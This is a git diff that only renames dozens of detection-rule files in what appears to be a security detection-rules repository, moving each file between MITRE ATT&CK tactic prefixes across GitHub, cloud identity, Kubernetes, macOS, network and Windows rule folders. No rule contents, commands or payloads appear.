diff --git a/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml b/rules/integrations/github/collection_github_high_number_of_cloned_repos_from_pat.toml
similarity index 100%
rename from rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml
rename to rules/integrations/github/collection_github_high_number_of_cloned_repos_from_pat.toml
diff --git a/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml b/rules/integrations/github/collection_github_repository_activity_from_unusual_ip.toml
similarity index 100%
rename from rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml
rename to rules/integrations/github/collection_github_repository_activity_from_unusual_ip.toml
diff --git a/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml b/rules/integrations/github/collection_high_number_of_cloning_by_user.toml
similarity index 100%
rename from rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml
rename to rules/integrations/github/collection_high_number_of_cloning_by_user.toml
diff --git a/rules/integrations/github/execution_github_app_deleted.toml b/rules/integrations/github/defense_evasion_github_app_deleted.toml
similarity index 100%
rename from rules/integrations/github/execution_github_app_deleted.toml
rename to rules/integrations/github/defense_evasion_github_app_deleted.toml
diff --git a/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml b/rules/integrations/github/impact_github_actions_bot_first_push_to_repo.toml
similarity index 100%
rename from rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml
rename to rules/integrations/github/impact_github_actions_bot_first_push_to_repo.toml
diff --git a/rules/integrations/github/execution_new_github_app_installed.toml b/rules/integrations/github/persistence_new_github_app_installed.toml
similarity index 100%
rename from rules/integrations/github/execution_new_github_app_installed.toml
rename to rules/integrations/github/persistence_new_github_app_installed.toml
diff --git a/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml b/rules/integrations/google_workspace/collection_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml
similarity index 100%
rename from rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml
rename to rules/integrations/google_workspace/collection_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml
diff --git a/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml b/rules/integrations/google_workspace/credential_access_google_workspace_mfa_enforcement_disabled.toml
similarity index 100%
rename from rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml
rename to rules/integrations/google_workspace/credential_access_google_workspace_mfa_enforcement_disabled.toml
diff --git a/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml b/rules/integrations/google_workspace/defense_evasion_google_workspace_2sv_policy_disabled.toml
similarity index 100%
rename from rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml
rename to rules/integrations/google_workspace/defense_evasion_google_workspace_2sv_policy_disabled.toml
diff --git a/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml b/rules/integrations/google_workspace/defense_evasion_google_workspace_password_policy_modified.toml
similarity index 100%
rename from rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml
rename to rules/integrations/google_workspace/defense_evasion_google_workspace_password_policy_modified.toml
diff --git a/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml b/rules/integrations/google_workspace/defense_evasion_mfa_disabled_for_google_workspace_organization.toml
similarity index 100%
rename from rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml
rename to rules/integrations/google_workspace/defense_evasion_mfa_disabled_for_google_workspace_organization.toml
diff --git a/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml b/rules/integrations/google_workspace/execution_object_copied_to_external_drive_with_app_consent.toml
similarity index 100%
rename from rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml
rename to rules/integrations/google_workspace/execution_object_copied_to_external_drive_with_app_consent.toml
diff --git a/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml b/rules/integrations/google_workspace/exfiltration_google_drive_ownership_transferred_via_google_workspace.toml
similarity index 100%
rename from rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml
rename to rules/integrations/google_workspace/exfiltration_google_drive_ownership_transferred_via_google_workspace.toml
diff --git a/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml b/rules/integrations/google_workspace/persistence_external_user_added_to_google_workspace_group.toml
similarity index 100%
rename from rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml
rename to rules/integrations/google_workspace/persistence_external_user_added_to_google_workspace_group.toml
diff --git a/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml b/rules/integrations/google_workspace/persistence_google_workspace_suspended_user_renewed.toml
similarity index 100%
rename from rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml
rename to rules/integrations/google_workspace/persistence_google_workspace_suspended_user_renewed.toml
diff --git a/rules/integrations/kubernetes/discovery_denied_service_account_request.toml b/rules/integrations/kubernetes/defense_evasion_denied_service_account_request.toml
similarity index 100%
rename from rules/integrations/kubernetes/discovery_denied_service_account_request.toml
rename to rules/integrations/kubernetes/defense_evasion_denied_service_account_request.toml
diff --git a/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml b/rules/integrations/kubernetes/discovery_forbidden_request_from_unsual_user_agent.toml
similarity index 100%
rename from rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml
rename to rules/integrations/kubernetes/discovery_forbidden_request_from_unsual_user_agent.toml
diff --git a/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml b/rules/integrations/kubernetes/discovery_unusual_request_response_by_user_agent.toml
similarity index 100%
rename from rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml
rename to rules/integrations/kubernetes/discovery_unusual_request_response_by_user_agent.toml
diff --git a/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml b/rules/integrations/kubernetes/execution_container_created_with_excessive_linux_capabilities.toml
similarity index 100%
rename from rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml
rename to rules/integrations/kubernetes/execution_container_created_with_excessive_linux_capabilities.toml
diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml b/rules/integrations/kubernetes/execution_pod_created_with_hostipc.toml
similarity index 100%
rename from rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml
rename to rules/integrations/kubernetes/execution_pod_created_with_hostipc.toml
diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml b/rules/integrations/kubernetes/execution_pod_created_with_hostnetwork.toml
similarity index 100%
rename from rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml
rename to rules/integrations/kubernetes/execution_pod_created_with_hostnetwork.toml
diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml b/rules/integrations/kubernetes/execution_pod_created_with_hostpid.toml
similarity index 100%
rename from rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml
rename to rules/integrations/kubernetes/execution_pod_created_with_hostpid.toml
diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml b/rules/integrations/kubernetes/execution_pod_created_with_sensitive_hostpath_volume.toml
similarity index 100%
rename from rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml
rename to rules/integrations/kubernetes/execution_pod_created_with_sensitive_hostpath_volume.toml
diff --git a/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml b/rules/integrations/kubernetes/execution_privileged_pod_created.toml
similarity index 100%
rename from rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml
rename to rules/integrations/kubernetes/execution_privileged_pod_created.toml
diff --git a/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml b/rules/integrations/kubernetes/execution_sensitive_rbac_change_followed_by_workload_modification.toml
similarity index 100%
rename from rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml
rename to rules/integrations/kubernetes/execution_sensitive_rbac_change_followed_by_workload_modification.toml
diff --git a/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml b/rules/integrations/kubernetes/execution_sensitive_workload_modification_by_user_agent.toml
similarity index 100%
rename from rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml
rename to rules/integrations/kubernetes/execution_sensitive_workload_modification_by_user_agent.toml
diff --git a/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml b/rules/integrations/kubernetes/execution_suspicious_assignment_of_controller_service_account.toml
similarity index 100%
rename from rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml
rename to rules/integrations/kubernetes/execution_suspicious_assignment_of_controller_service_account.toml
diff --git a/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml b/rules/integrations/kubernetes/initial_access_exposed_service_created_with_type_nodeport.toml
similarity index 100%
rename from rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml
rename to rules/integrations/kubernetes/initial_access_exposed_service_created_with_type_nodeport.toml
diff --git a/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml b/rules/integrations/kubernetes/persistence_service_account_rbac_write_operation.toml
similarity index 100%
rename from rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml
rename to rules/integrations/kubernetes/persistence_service_account_rbac_write_operation.toml
diff --git a/rules/integrations/kubernetes/execution_forbidden_creation_request.toml b/rules/integrations/kubernetes/privilege_escalation_forbidden_creation_request.toml
similarity index 100%
rename from rules/integrations/kubernetes/execution_forbidden_creation_request.toml
rename to rules/integrations/kubernetes/privilege_escalation_forbidden_creation_request.toml
diff --git a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml b/rules/integrations/lmd/execution_ml_high_mean_rdp_process_args.toml
similarity index 100%
rename from rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml
rename to rules/integrations/lmd/execution_ml_high_mean_rdp_process_args.toml
diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml b/rules/integrations/lmd/exfiltration_ml_spike_in_remote_file_transfers.toml
similarity index 100%
rename from rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml
rename to rules/integrations/lmd/exfiltration_ml_spike_in_remote_file_transfers.toml
diff --git a/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml b/rules/integrations/o365/collection_exchange_transport_rule_creation.toml
similarity index 100%
rename from rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml
rename to rules/integrations/o365/collection_exchange_transport_rule_creation.toml
diff --git a/rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml b/rules/integrations/o365/collection_sharepoint_sensitive_term_search.toml
similarity index 100%
rename from rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml
rename to rules/integrations/o365/collection_sharepoint_sensitive_term_search.toml
diff --git a/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/o365/credential_access_identity_oauth_phishing_via_first_party_microsoft_application.toml
similarity index 100%
rename from rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml
rename to rules/integrations/o365/credential_access_identity_oauth_phishing_via_first_party_microsoft_application.toml
diff --git a/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml b/rules/integrations/o365/credential_access_identity_unusual_sso_errors_for_user.toml
similarity index 100%
rename from rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml
rename to rules/integrations/o365/credential_access_identity_unusual_sso_errors_for_user.toml
diff --git a/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml b/rules/integrations/o365/defense_evasion_exchange_new_or_modified_federation_domain.toml
similarity index 100%
rename from rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml
rename to rules/integrations/o365/defense_evasion_exchange_new_or_modified_federation_domain.toml
diff --git a/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml b/rules/integrations/o365/defense_evasion_exchange_transport_rule_modification.toml
similarity index 100%
rename from rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml
rename to rules/integrations/o365/defense_evasion_exchange_transport_rule_modification.toml
diff --git a/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml b/rules/integrations/o365/persistence_identity_illicit_consent_grant_via_registered_application.toml
similarity index 100%
rename from rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml
rename to rules/integrations/o365/persistence_identity_illicit_consent_grant_via_registered_application.toml
diff --git a/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml b/rules/integrations/o365/persistence_sharepoint_site_collection_admin_added.toml
similarity index 100%
rename from rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml
rename to rules/integrations/o365/persistence_sharepoint_site_collection_admin_added.toml
diff --git a/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml b/rules/integrations/okta/defense_evasion_mfa_deactivation_with_no_reactivation.toml
similarity index 100%
rename from rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml
rename to rules/integrations/okta/defense_evasion_mfa_deactivation_with_no_reactivation.toml
diff --git a/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml b/rules/integrations/okta/defense_evasion_multiple_sessions_for_single_user.toml
similarity index 100%
rename from rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml
rename to rules/integrations/okta/defense_evasion_multiple_sessions_for_single_user.toml
diff --git a/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml b/rules/integrations/okta/defense_evasion_multiple_user_agent_os_authentication.toml
similarity index 100%
rename from rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml
rename to rules/integrations/okta/defense_evasion_multiple_user_agent_os_authentication.toml
diff --git a/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml b/rules/integrations/okta/defense_evasion_okta_aitm_session_cookie_replay.toml
similarity index 100%
rename from rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml
rename to rules/integrations/okta/defense_evasion_okta_aitm_session_cookie_replay.toml
diff --git a/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_application.toml
similarity index 100%
rename from rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml
rename to rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_application.toml
diff --git a/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_application.toml
similarity index 100%
rename from rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml
rename to rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_application.toml
diff --git a/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml
similarity index 100%
rename from rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml
rename to rules/integrations/okta/defense_evasion_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml
diff --git a/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml b/rules/integrations/okta/defense_evasion_sign_in_events_via_third_party_idp.toml
similarity index 100%
rename from rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml
rename to rules/integrations/okta/defense_evasion_sign_in_events_via_third_party_idp.toml
diff --git a/rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml b/rules/integrations/okta/defense_evasion_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml
similarity index 100%
rename from rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml
rename to rules/integrations/okta/defense_evasion_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml
diff --git a/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml b/rules/integrations/okta/defense_evasion_successful_application_sso_from_unknown_client_device.toml
similarity index 100%
rename from rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml
rename to rules/integrations/okta/defense_evasion_successful_application_sso_from_unknown_client_device.toml
diff --git a/rules/integrations/okta/credential_access_user_impersonation_access.toml b/rules/integrations/okta/defense_evasion_user_impersonation_access.toml
similarity index 100%
rename from rules/integrations/okta/credential_access_user_impersonation_access.toml
rename to rules/integrations/okta/defense_evasion_user_impersonation_access.toml
diff --git a/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml b/rules/integrations/okta/initial_access_suspicious_okta_user_password_reset_or_unlock_attempts.toml
similarity index 100%
rename from rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml
rename to rules/integrations/okta/initial_access_suspicious_okta_user_password_reset_or_unlock_attempts.toml
diff --git a/rules/macos/credential_access_high_volume_of_pbpaste.toml b/rules/macos/collection_high_volume_of_pbpaste.toml
similarity index 100%
rename from rules/macos/credential_access_high_volume_of_pbpaste.toml
rename to rules/macos/collection_high_volume_of_pbpaste.toml
diff --git a/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml b/rules/macos/collection_suspicious_tcc_access_granted.toml
similarity index 100%
rename from rules/macos/defense_evasion_suspicious_tcc_access_granted.toml
rename to rules/macos/collection_suspicious_tcc_access_granted.toml
diff --git a/rules/macos/persistence_curl_execution_via_shell_profile.toml b/rules/macos/command_and_control_curl_execution_via_shell_profile.toml
similarity index 100%
rename from rules/macos/persistence_curl_execution_via_shell_profile.toml
rename to rules/macos/command_and_control_curl_execution_via_shell_profile.toml
diff --git a/rules/macos/execution_installer_package_spawned_network_event.toml b/rules/macos/command_and_control_installer_package_spawned_network_event.toml
similarity index 100%
rename from rules/macos/execution_installer_package_spawned_network_event.toml
rename to rules/macos/command_and_control_installer_package_spawned_network_event.toml
diff --git a/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml b/rules/macos/command_and_control_scripting_osascript_exec_followed_by_netcon.toml
similarity index 100%
rename from rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml
rename to rules/macos/command_and_control_scripting_osascript_exec_followed_by_netcon.toml
diff --git a/rules/macos/persistence_account_creation_hide_at_logon.toml b/rules/macos/defense_evasion_account_creation_hide_at_logon.toml
similarity index 100%
rename from rules/macos/persistence_account_creation_hide_at_logon.toml
rename to rules/macos/defense_evasion_account_creation_hide_at_logon.toml
diff --git a/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml b/rules/macos/defense_evasion_evasion_hidden_launch_agent_deamon_creation.toml
similarity index 100%
rename from rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml
rename to rules/macos/defense_evasion_evasion_hidden_launch_agent_deamon_creation.toml
diff --git a/rules/macos/persistence_hidden_plist_filename.toml b/rules/macos/defense_evasion_hidden_plist_filename.toml
similarity index 100%
rename from rules/macos/persistence_hidden_plist_filename.toml
rename to rules/macos/defense_evasion_hidden_plist_filename.toml
diff --git a/rules/macos/discovery_suspicious_sip_check.toml b/rules/macos/defense_evasion_suspicious_sip_check.toml
similarity index 100%
rename from rules/macos/discovery_suspicious_sip_check.toml
rename to rules/macos/defense_evasion_suspicious_sip_check.toml
diff --git a/rules/macos/privilege_escalation_applescript_with_admin_privs.toml b/rules/macos/execution_applescript_with_admin_privs.toml
similarity index 100%
rename from rules/macos/privilege_escalation_applescript_with_admin_privs.toml
rename to rules/macos/execution_applescript_with_admin_privs.toml
diff --git a/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml b/rules/macos/execution_explicit_creds_via_scripting.toml
similarity index 100%
rename from rules/macos/privilege_escalation_explicit_creds_via_scripting.toml
rename to rules/macos/execution_explicit_creds_via_scripting.toml
diff --git a/rules/macos/command_and_control_perl_outbound_network_connection.toml b/rules/macos/execution_perl_outbound_network_connection.toml
similarity index 100%
rename from rules/macos/command_and_control_perl_outbound_network_connection.toml
rename to rules/macos/execution_perl_outbound_network_connection.toml
diff --git a/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml b/rules/macos/execution_suspicious_mac_ms_office_child_process.toml
similarity index 100%
rename from rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml
rename to rules/macos/execution_suspicious_mac_ms_office_child_process.toml
diff --git a/rules/macos/lateral_movement_vpn_connection_attempt.toml b/rules/macos/initial_access_vpn_connection_attempt.toml
similarity index 100%
rename from rules/macos/lateral_movement_vpn_connection_attempt.toml
rename to rules/macos/initial_access_vpn_connection_attempt.toml
diff --git a/rules/macos/privilege_escalation_local_user_added_to_admin.toml b/rules/macos/persistence_local_user_added_to_admin.toml
similarity index 100%
rename from rules/macos/privilege_escalation_local_user_added_to_admin.toml
rename to rules/macos/persistence_local_user_added_to_admin.toml
diff --git a/rules/macos/lateral_movement_remote_ssh_login_enabled.toml b/rules/macos/persistence_remote_ssh_login_enabled.toml
similarity index 100%
rename from rules/macos/lateral_movement_remote_ssh_login_enabled.toml
rename to rules/macos/persistence_remote_ssh_login_enabled.toml
diff --git a/rules/macos/privilege_escalation_root_crontab_filemod.toml b/rules/macos/persistence_root_crontab_filemod.toml
similarity index 100%
rename from rules/macos/privilege_escalation_root_crontab_filemod.toml
rename to rules/macos/persistence_root_crontab_filemod.toml
diff --git a/rules/macos/privilege_escalation_user_added_to_admin_group.toml b/rules/macos/persistence_user_added_to_admin_group.toml
similarity index 100%
rename from rules/macos/privilege_escalation_user_added_to_admin_group.toml
rename to rules/macos/persistence_user_added_to_admin_group.toml
diff --git a/rules/ml/execution_ml_windows_anomalous_script.toml b/rules/ml/defense_evasion_ml_windows_anomalous_script.toml
similarity index 100%
rename from rules/ml/execution_ml_windows_anomalous_script.toml
rename to rules/ml/defense_evasion_ml_windows_anomalous_script.toml
diff --git a/rules/ml/persistence_ml_rare_process_by_host_linux.toml b/rules/ml/execution_ml_rare_process_by_host_linux.toml
similarity index 100%
rename from rules/ml/persistence_ml_rare_process_by_host_linux.toml
rename to rules/ml/execution_ml_rare_process_by_host_linux.toml
diff --git a/rules/ml/persistence_ml_windows_anomalous_path_activity.toml b/rules/ml/execution_ml_windows_anomalous_path_activity.toml
similarity index 100%
rename from rules/ml/persistence_ml_windows_anomalous_path_activity.toml
rename to rules/ml/execution_ml_windows_anomalous_path_activity.toml
diff --git a/rules/ml/persistence_ml_windows_anomalous_process_creation.toml b/rules/ml/execution_ml_windows_anomalous_process_creation.toml
similarity index 100%
rename from rules/ml/persistence_ml_windows_anomalous_process_creation.toml
rename to rules/ml/execution_ml_windows_anomalous_process_creation.toml
diff --git a/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml b/rules/network/command_and_control_rpc_remote_procedure_call_to_the_internet.toml
similarity index 100%
rename from rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml
rename to rules/network/command_and_control_rpc_remote_procedure_call_to_the_internet.toml
diff --git a/rules/network/initial_access_react_server_components_rce_attempt.toml b/rules/network/execution_react_server_components_rce_attempt.toml
similarity index 100%
rename from rules/network/initial_access_react_server_components_rce_attempt.toml
rename to rules/network/execution_react_server_components_rce_attempt.toml
diff --git a/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml b/rules/network/exfiltration_smb_windows_file_sharing_activity_to_the_internet.toml
similarity index 100%
rename from rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml
rename to rules/network/exfiltration_smb_windows_file_sharing_activity_to_the_internet.toml
diff --git a/rules/network/command_and_control_accepted_default_telnet_port_connection.toml b/rules/network/initial_access_accepted_default_telnet_port_connection.toml
similarity index 100%
rename from rules/network/command_and_control_accepted_default_telnet_port_connection.toml
rename to rules/network/initial_access_accepted_default_telnet_port_connection.toml
diff --git a/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml b/rules/network/initial_access_rdp_remote_desktop_protocol_from_the_internet.toml
similarity index 100%
rename from rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml
rename to rules/network/initial_access_rdp_remote_desktop_protocol_from_the_internet.toml
diff --git a/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml b/rules/network/initial_access_vnc_virtual_network_computing_from_the_internet.toml
similarity index 100%
rename from rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml
rename to rules/network/initial_access_vnc_virtual_network_computing_from_the_internet.toml
diff --git a/rules/network/initial_access_unsecure_elasticsearch_node.toml b/rules/network/reconnaissance_unsecure_elasticsearch_node.toml
similarity index 100%
rename from rules/network/initial_access_unsecure_elasticsearch_node.toml
rename to rules/network/reconnaissance_unsecure_elasticsearch_node.toml
diff --git a/rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml b/rules/promotions/defense_evasion_endgame_cred_manipulation_detected.toml
similarity index 100%
rename from rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml
rename to rules/promotions/defense_evasion_endgame_cred_manipulation_detected.toml
diff --git a/rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml b/rules/promotions/defense_evasion_endgame_cred_manipulation_prevented.toml
similarity index 100%
rename from rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml
rename to rules/promotions/defense_evasion_endgame_cred_manipulation_prevented.toml
diff --git a/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml b/rules/promotions/defense_evasion_endgame_permission_theft_detected.toml
similarity index 100%
rename from rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml
rename to rules/promotions/defense_evasion_endgame_permission_theft_detected.toml
diff --git a/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml b/rules/promotions/defense_evasion_endgame_permission_theft_prevented.toml
similarity index 100%
rename from rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml
rename to rules/promotions/defense_evasion_endgame_permission_theft_prevented.toml
diff --git a/rules/promotions/privilege_escalation_endgame_process_injection_detected.toml b/rules/promotions/defense_evasion_endgame_process_injection_detected.toml
similarity index 100%
rename from rules/promotions/privilege_escalation_endgame_process_injection_detected.toml
rename to rules/promotions/defense_evasion_endgame_process_injection_detected.toml
diff --git a/rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml b/rules/promotions/defense_evasion_endgame_process_injection_prevented.toml
similarity index 100%
rename from rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml
rename to rules/promotions/defense_evasion_endgame_process_injection_prevented.toml
diff --git a/rules/windows/credential_access_adidns_wildcard.toml b/rules/windows/collection_adidns_wildcard.toml
similarity index 100%
rename from rules/windows/credential_access_adidns_wildcard.toml
rename to rules/windows/collection_adidns_wildcard.toml
diff --git a/rules/windows/credential_access_browsers_unusual_parent.toml b/rules/windows/collection_browsers_unusual_parent.toml
similarity index 100%
rename from rules/windows/credential_access_browsers_unusual_parent.toml
rename to rules/windows/collection_browsers_unusual_parent.toml
diff --git a/rules/windows/credential_access_dnsnode_creation.toml b/rules/windows/collection_dnsnode_creation.toml
similarity index 100%
rename from rules/windows/credential_access_dnsnode_creation.toml
rename to rules/windows/collection_dnsnode_creation.toml
diff --git a/rules/windows/credential_access_web_config_file_access.toml b/rules/windows/collection_web_config_file_access.toml
similarity index 100%
rename from rules/windows/credential_access_web_config_file_access.toml
rename to rules/windows/collection_web_config_file_access.toml
diff --git a/rules/windows/execution_command_prompt_connecting_to_the_internet.toml b/rules/windows/command_and_control_command_prompt_connecting_to_the_internet.toml
similarity index 100%
rename from rules/windows/execution_command_prompt_connecting_to_the_internet.toml
rename to rules/windows/command_and_control_command_prompt_connecting_to_the_internet.toml
diff --git a/rules/windows/defense_evasion_msiexec_remote_payload.toml b/rules/windows/command_and_control_msiexec_remote_payload.toml
similarity index 100%
rename from rules/windows/defense_evasion_msiexec_remote_payload.toml
rename to rules/windows/command_and_control_msiexec_remote_payload.toml
diff --git a/rules/windows/execution_revshell_cmd_via_netcat.toml b/rules/windows/command_and_control_revshell_cmd_via_netcat.toml
similarity index 100%
rename from rules/windows/execution_revshell_cmd_via_netcat.toml
rename to rules/windows/command_and_control_revshell_cmd_via_netcat.toml
diff --git a/rules/windows/execution_scripting_remote_webdav.toml b/rules/windows/command_and_control_scripting_remote_webdav.toml
similarity index 100%
rename from rules/windows/execution_scripting_remote_webdav.toml
rename to rules/windows/command_and_control_scripting_remote_webdav.toml
diff --git a/rules/windows/defense_evasion_suspicious_certutil_commands.toml b/rules/windows/command_and_control_suspicious_certutil_commands.toml
similarity index 100%
rename from rules/windows/defense_evasion_suspicious_certutil_commands.toml
rename to rules/windows/command_and_control_suspicious_certutil_commands.toml
diff --git a/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml b/rules/windows/command_and_control_unusual_network_connection_via_dllhost.toml
similarity index 100%
rename from rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml
rename to rules/windows/command_and_control_unusual_network_connection_via_dllhost.toml
diff --git a/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml b/rules/windows/command_and_control_unusual_network_connection_via_rundll32.toml
similarity index 100%
rename from rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml
rename to rules/windows/command_and_control_unusual_network_connection_via_rundll32.toml
diff --git a/rules/windows/execution_posh_hacktool_functions.toml b/rules/windows/credential_access_posh_hacktool_functions.toml
similarity index 100%
rename from rules/windows/execution_posh_hacktool_functions.toml
rename to rules/windows/credential_access_posh_hacktool_functions.toml
diff --git a/rules/windows/exfiltration_smb_rare_destination.toml b/rules/windows/credential_access_smb_rare_destination.toml
similarity index 100%
rename from rules/windows/exfiltration_smb_rare_destination.toml
